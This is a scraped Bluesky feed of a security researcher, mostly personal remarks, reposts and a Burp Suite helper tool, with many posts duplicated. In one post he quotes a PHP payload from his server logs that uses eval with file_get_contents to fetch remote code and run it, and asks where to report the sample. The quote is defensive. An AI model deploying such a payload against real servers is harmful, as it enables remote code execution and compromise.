Pieter Hiele
@honoki.net
💻 hacker / relapsed bug bounty hunter
💤 mostly tired of tech
✍️ occasional blogger
🎵 amateur jazz pianist
⁉️ chess enthusiast
🤿 daydreaming of scuba diving
🌐 https://honoki.net
💤 mostly tired of tech
✍️ occasional blogger
🎵 amateur jazz pianist
⁉️ chess enthusiast
🤿 daydreaming of scuba diving
🌐 https://honoki.net
Trump trying to offset his CO2 emissions by disrupting air travel was not what I expected for 2025.
November 10, 2025 at 10:09 AM
Trump trying to offset his CO2 emissions by disrupting air travel was not what I expected for 2025.
TIL about ghost bikes. en.wikipedia.org/wiki/Ghost_b...
November 8, 2025 at 12:00 PM
TIL about ghost bikes. en.wikipedia.org/wiki/Ghost_b...
Reposted by Pieter Hiele
so glad they left that little autobus sign on the wall in st-guidon 🙂
November 7, 2025 at 8:26 AM
so glad they left that little autobus sign on the wall in st-guidon 🙂
Reposted by Pieter Hiele
Chatbots — LLMs — do not know facts and are not designed to be able to accurately answer factual questions. They are designed to find and mimic patterns of words, probabilistically. When they’re “right” it’s because correct things are often written down, so those patterns are frequent. That’s all.
June 19, 2025 at 11:21 AM
Chatbots — LLMs — do not know facts and are not designed to be able to accurately answer factual questions. They are designed to find and mimic patterns of words, probabilistically. When they’re “right” it’s because correct things are often written down, so those patterns are frequent. That’s all.
Reposted by Pieter Hiele
📣THREAD: It’s surprising to me that so many people were surprised to learn that Signal runs partly on AWS (something we can do because we use encryption to make sure no one but you–not AWS, not Signal, not anyone–can access your comms).
It’s also concerning. 1/
It’s also concerning. 1/
PSA: we're aware that Signal is down for some people. This appears to be related to a major AWS outage. Stand by.
October 27, 2025 at 10:38 AM
📣THREAD: It’s surprising to me that so many people were surprised to learn that Signal runs partly on AWS (something we can do because we use encryption to make sure no one but you–not AWS, not Signal, not anyone–can access your comms).
It’s also concerning. 1/
It’s also concerning. 1/
I wrote a small utility to copy unique domains, URLs, paths, filenames or directories from a selection on the Target Map in Burp Suite.
The directories is especially useful in combination with something like ffuf, e.g. for /path/to/folder/file.txt will return the list
/path
/path/to
/path/to/folder
The directories is especially useful in combination with something like ffuf, e.g. for /path/to/folder/file.txt will return the list
/path
/path/to
/path/to/folder
GitHub - honoki/burp-copy-unique-domains
Contribute to honoki/burp-copy-unique-domains development by creating an account on GitHub.
github.com
October 20, 2025 at 1:21 PM
I wrote a small utility to copy unique domains, URLs, paths, filenames or directories from a selection on the Target Map in Burp Suite.
The directories is especially useful in combination with something like ffuf, e.g. for /path/to/folder/file.txt will return the list
/path
/path/to
/path/to/folder
The directories is especially useful in combination with something like ffuf, e.g. for /path/to/folder/file.txt will return the list
/path
/path/to
/path/to/folder
Reposted by Pieter Hiele
50 Cent Adjusted for Inflation
50 Cent Adjusted for Inflation
109 Cent
50centadjustedforinflation.com
October 18, 2025 at 7:07 AM
50 Cent Adjusted for Inflation
I've suddenly had an idea for a new series of NFTs, lmk if you wanna invest
‘Bored aliens’: has intelligent life stopped bothering trying to contact Earth?
‘Bored aliens’: has intelligent life stopped bothering trying to contact Earth?
Astrophysicist proposes a ‘radically mundane’ theory for why humans have yet to encounter extraterrestrials
www.theguardian.com
October 15, 2025 at 11:22 AM
I've suddenly had an idea for a new series of NFTs, lmk if you wanna invest
Oh great, now GitHub is being flooded with fake AI-generated POCs for CVEs that look like nuclei templates but are actually worthless.
October 13, 2025 at 2:59 PM
Oh great, now GitHub is being flooded with fake AI-generated POCs for CVEs that look like nuclei templates but are actually worthless.
Reposted by Pieter Hiele
Hi Internet! I'm Drew and THIS IS MY FACE.
If this GIF has ever brought you joy in the past, I humbly ask you to consider making a donation to the National MS Society. It would mean a lot to me and to those I know affected by the disease!
Donate at blinkingguy.com
If this GIF has ever brought you joy in the past, I humbly ask you to consider making a donation to the National MS Society. It would mean a lot to me and to those I know affected by the disease!
Donate at blinkingguy.com
September 26, 2025 at 3:37 PM
Hi Internet! I'm Drew and THIS IS MY FACE.
If this GIF has ever brought you joy in the past, I humbly ask you to consider making a donation to the National MS Society. It would mean a lot to me and to those I know affected by the disease!
Donate at blinkingguy.com
If this GIF has ever brought you joy in the past, I humbly ask you to consider making a donation to the National MS Society. It would mean a lot to me and to those I know affected by the disease!
Donate at blinkingguy.com
Reposted by Pieter Hiele
September 27, 2025 at 5:01 AM
Wait Akamai and Linode are the same thing now?!
September 19, 2025 at 1:02 PM
Wait Akamai and Linode are the same thing now?!
Reposted by Pieter Hiele
Wie zijn de grootste gebruikers van AI?
September 6, 2025 at 5:09 AM
Wie zijn de grootste gebruikers van AI?
Seeing this malware in my logs, and wondering where the best place is to upload the samples to see if this is being tracked.
["call_user_func","create_function","","@eval(file_get_contents('http:///api/file?token=fofascan&file=code/sdsql.txt'));"]
any suggestions? /cc @doublepulsar.com
["call_user_func","create_function","","@eval(file_get_contents('http://
any suggestions? /cc @doublepulsar.com
September 3, 2025 at 7:23 AM
Seeing this malware in my logs, and wondering where the best place is to upload the samples to see if this is being tracked.
["call_user_func","create_function","","@eval(file_get_contents('http:///api/file?token=fofascan&file=code/sdsql.txt'));"]
any suggestions? /cc @doublepulsar.com
["call_user_func","create_function","","@eval(file_get_contents('http://
any suggestions? /cc @doublepulsar.com
Happy September everyone!
September 1, 2025 at 8:59 AM
Happy September everyone!
This is the curse of non-native speakers. I (re)discover my mispronunciations pretty regularly.
former kids who read too many books and didnt know how to pronounce the words you learned gang say hey
August 31, 2025 at 5:39 AM
This is the curse of non-native speakers. I (re)discover my mispronunciations pretty regularly.
Can anybody recommend a split keyboard that they particularly like? I'm reading a lot of good about the ZSA Moonlander but want to contemplate my options a bit longer before I splurge.
August 29, 2025 at 7:40 PM
Can anybody recommend a split keyboard that they particularly like? I'm reading a lot of good about the ZSA Moonlander but want to contemplate my options a bit longer before I splurge.
"If you feel like you've got too much control over your end-user devices, we've got you covered!"
August 29, 2025 at 7:30 PM
"If you feel like you've got too much control over your end-user devices, we've got you covered!"
Welcome to your nightmare future.
August 29, 2025 at 7:27 PM
Welcome to your nightmare future.
Reposted by Pieter Hiele
Picture perfect? How one of the best tennis photos of all time was taken at the US Open
Picture perfect? How one of the best tennis photos of all time was taken at the US Open
Photographer Ray Giubilo’s half terrifying, half sublime one-in-a-million image of Jasmine Paolini had more than an element of fortune to it
www.theguardian.com
August 28, 2025 at 9:34 AM
Picture perfect? How one of the best tennis photos of all time was taken at the US Open
Reposted by Pieter Hiele
I discovered how to use CSS to steal attribute data without selectors and stylesheet imports! This means you can now exploit CSS injection via style attributes! Learn how below:
portswigger.net/research/inl...
portswigger.net/research/inl...
August 26, 2025 at 12:54 PM
I discovered how to use CSS to steal attribute data without selectors and stylesheet imports! This means you can now exploit CSS injection via style attributes! Learn how below:
portswigger.net/research/inl...
portswigger.net/research/inl...
Reposted by Pieter Hiele
We have a societal and educational crisis on our hands of people not understanding what LLMs are and are not, can and cannot do. It's impacting economics, the job market, art, mental health, and business at all levels. If you think I'm an AI skeptic because I don't understand them, think again.
August 24, 2025 at 5:48 AM
We have a societal and educational crisis on our hands of people not understanding what LLMs are and are not, can and cannot do. It's impacting economics, the job market, art, mental health, and business at all levels. If you think I'm an AI skeptic because I don't understand them, think again.
Is dat hoe je “er is sprake van” schrijft?
August 22, 2025 at 9:06 AM
Is dat hoe je “er is sprake van” schrijft?
Reposted by Pieter Hiele
